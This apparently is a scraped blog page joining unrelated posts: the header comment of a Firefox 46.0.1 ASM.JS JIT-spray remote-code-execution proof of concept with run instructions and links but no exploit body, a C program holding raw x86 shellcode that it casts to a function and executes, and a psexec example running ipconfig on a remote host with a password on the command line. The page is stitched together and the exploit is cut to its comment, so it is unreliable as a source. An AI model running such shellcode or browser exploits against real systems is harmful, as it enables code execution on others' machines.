Demo Firefox 46.0.1 – ASM.JS JIT-Spray Remote Code Execution

<!--
 
    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
    *PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)
    ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
 
    Tested on:
    Firefox 46.0.1 32-bit - Windows 10 1709
    https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe
 
    Howto:
    1) serve PoC over network and open it in Firefox 46.0.1 32-bit
    2) A successfull exploit attempt should pop calc.exe
 
    Mozilla Bug Report:
    https://bugzilla.mozilla.org/show_bug.cgi?id=1270381
 
 
    Writeup: 
    https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
 
 
    - For research purposes only -
     
    (C) Rh0
 
    Mar. 13, 2018
 

Reference :
Firefox 46.0.1 – ASM.JS JIT-Spray Remote Code Execution
https://www.exploit-db.com/exploits/44293/
shellcode2asmjs: Generate arbitrary ASM.JS JIT-Spray payloads
https://github.com/rh0dev/shellcode2asmjs

Happy New Year 2018

Shellcode with Chinese characters, win32/64 windows 7

2018


/*

               __
               /\/'-,
       ,--'''''   /"
 ____,'.  )       \___
'"""""------'"""`-----'

Happy New Year -  新年快樂

*/
#include<stdio.h>
#include<string.h>


char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08"
                   "\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c"
                   "\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01"
                   "\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69"
                   "\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01" 
                   "\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x61\x72\x20\x01\x68\x77\x20\x59"
                   "\x65\x68\x79\x20\x4e\x65\x68\x48\x61\x70\x70\x89\xe1\xfe\x49\x0f"
                   "\x31\xc0\x51\x50\xff\xd7"
                   "\新\年\快\樂\狗\年\行\大\運\好\運\旺\旺\來";  
 
int main()
{
 
printf("shellcode length %ld\n",(unsigned)strlen(shellcode));
(* (int(*)()) shellcode) ();
}

How to get remote computer’s mac address from windows tool – “psexec”

How to get remote computer’s mac address from psexec

PS D:\Admin\User> psexec \\win10-test -u admin -p Pa$$w0rd ipconfig /all

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com



Windows IP Configuration

   Host Name . . . . . . . . . . . . : win10-test
   Primary Dns Suffix  . . . . . . . : contoso.com
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : contoso.com

Wireless LAN adapter Wi-Fi:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) Dual Band Wireless-AC 7265
   Physical Address. . . . . . . . . : F9-A4-C5-FA-0D-AA
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter
   Physical Address. . . . . . . . . : FA-A5-2C-A0-E0-AB
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : contoso.com
   Description . . . . . . . . . . . : Realtek PCIe GBE Family Controller
   Physical Address. . . . . . . . . : AD-A2-03-6C-CC-AC
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe21::3007:f746:5e9b:f2bf%12(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.10.4.10(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Lease Obtained. . . . . . . . . . : February 14, 2018 11:16:09 AM
   Lease Expires . . . . . . . . . . : February 21, 2018 11:16:08 AM
   Default Gateway . . . . . . . . . : 10.10.4.254
   DHCP Server . . . . . . . . . . . : 10.10.4.17
   DHCPv6 IAID . . . . . . . . . . . : 61661907
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-22-0F-C5-56-AC-E2-D3-63-C3-30
   DNS Servers . . . . . . . . . . . : 10.10.4.99
                                       10.10.4.100
   Primary WINS Server . . . . . . . : 10.10.4.101
   Secondary WINS Server . . . . . . : 10.10.4.102
   NetBIOS over Tcpip. . . . . . . . : Enabled

ipconfig exited on it100092 with error code 0.